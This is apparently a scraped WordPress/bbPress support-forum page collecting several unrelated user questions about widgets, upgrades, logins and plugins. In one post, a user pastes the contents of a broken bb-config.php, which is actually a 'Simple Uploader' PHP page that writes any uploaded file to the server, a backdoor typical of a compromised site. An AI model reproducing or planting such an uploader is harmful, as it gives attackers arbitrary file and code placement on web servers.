I posted this in troubleshooting but perhaps that wasn’t the right area.
I’m using the “bbPress Topics List” plugin and have set the maximum number of topics to list as 20, yet it only ever displays 5.
How can I force it to display more?
I posted this in troubleshooting but perhaps that wasn’t the right area.
I’m using the “bbPress Topics List” plugin and have set the maximum number of topics to list as 20, yet it only ever displays 5.
How can I force it to display more?
Are there any parameters for
Suddenly I cannot access my forums and am getting this error :
Warning: Unexpected character in input: ” (ASCII=92) state=1 in /home//bb-config.php on line 5
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/bb-config.php on line 17
I’ve deactivated all plugins on the main blog. This has the buddypress integration.
The last tampering before I noticed this was a single size change for a widget block in the themes stylesheet but the problem persists with switching themes. It cuts the homepage to half size as well without a scroll.
This is the bb-config:
title> Simple Uploader</title>
<body bgcolor=î#000000″ text=î#808080″ link=î#808080″ vlink=î#808080″>
<div align=îcenterî>
<center><font style=îfont-size: 16pt;î color=îlimeî face=îArialî>Simple uploader</font> </center>
<form enctype=îmultipart/form-dataî action=î<?php echo $_SERVER[“PHP_SELF”]; ?>î method=îpostî>
<div align=îcenterî STYLE=îfont-family: verdana; font-size: 10px;î>
<input type=îhiddenî name=îMAX_FILE_SIZEî value=î10000000024″>
File :
<input name=îuserfileî type=îfileî />
<input name=îsubmitî type=îsubmitî value=îUploadî />
</div>
</form>
<div align=îcenterî STYLE=îfont-family: verdana; font-size: 10px;î>
<?php
if (@is_uploaded_file($_FILES[“userfile”][“tmp_name”])) {
copy($_FILES[“userfile”][“tmp_name”], ìî . $_FILES[“userfile”][“name”]);
echo ì<p>File uploaded successfully</p>î;
}
?>
It’s been working properly for months with my new theme, any suggestions?
I don’t have any extra forum related plugin
I’m really wanting to move to 2.1, is there a way to upgrade my WordPress plugin of bbPress to that version?
I’ve set this widget to display 20 topics, but no matter what it only displays 5. Does anyone know how to fix this?
I’m using bbp_has_topics to display topics in my sidebar. On forum pages, this gives me strange results sometimes.
Is there a better way to display topics for a second time on one page? Or to reset the loop or whatever is causing the issue?
Ok, I think I ran into a snag.
My WordPress/BuddyPress site is HEAVILY modded with plugins. I use a RocketTheme theme that runs off of the Gantry Framework along with Gantry-BuddyPress (which allows BuddyPress to be compatible with the RocketTheme and Gantry Framework.)
The bbPress plugin worked, but only partially. The Forum page set up by bbPress is visible but instead of seeing the “directory” of forums it shows:
Home › Forums Forum Topics Posts Freshness General Discussion SO? what now? 1 1 26 mins Admin
It’s all just plain text with no links. But, the forum I made for General Discussion is viewable when I go to the forum page it made.
For reference, here are the demo page links:
http://bp.daevas.com/forums/
http://bp.daevas.com/forums/discussion/na-general-discussion/
I still have to edit the .css to match the theme design, but I wanted to find out what was wrong with the default forums page and why it wasn’t showing up correctly.
Thanks and hope you can help.
Hello all,
This is my first time here. My bbpress install went fine on a wordpress site thats exists for a while now. I was able to log in to …/bb-admin and edit options.
Next, I changed the cookies as described in the process to match those of wordpress.
I saved the changes & got logged out.
Now I am unable to log in to …/bb-admin and it says “admin” is not a user.
Appreciate any help,
S Ram
I have a problem, when I edit a topic there are a list below forum with all my categories and forum.
I think this list allow to move topic.
But this list is limited to 5 elements no more appear
Can help plz ?
Picture one the list name “Forum” :
http://imageshack.us/photo/my-images/838/capturedcran20120228162.png/
picture two 5 elements is the max ? :
http://imageshack.us/photo/my-images/845/capturedcran20120228162.png/
As you can see my forum have more then 5 elements:
http://rplayers.com/forums/
Edit I forgot :
I have this error when I try to save my edit :
ERROR: The ID of the forum is missing.
I have just created a bbpress forum using the bbpress plugin. I also use the Network Publisher plugin. This plugin posts to twitter and facebook whenever a new post on my website happens. The problem is that it also posts when a post on my bbpress forum happens. Is there a way to make it where it doesn’t act like a normal post or does anyone know if there is a different plugin I can use that doesn’t automatically post and requires you to manually add the option on each post? I just don’t want my website’s twitter and facebook post every time a bbpress topic is posted. I appreciate any and all help. Thanks!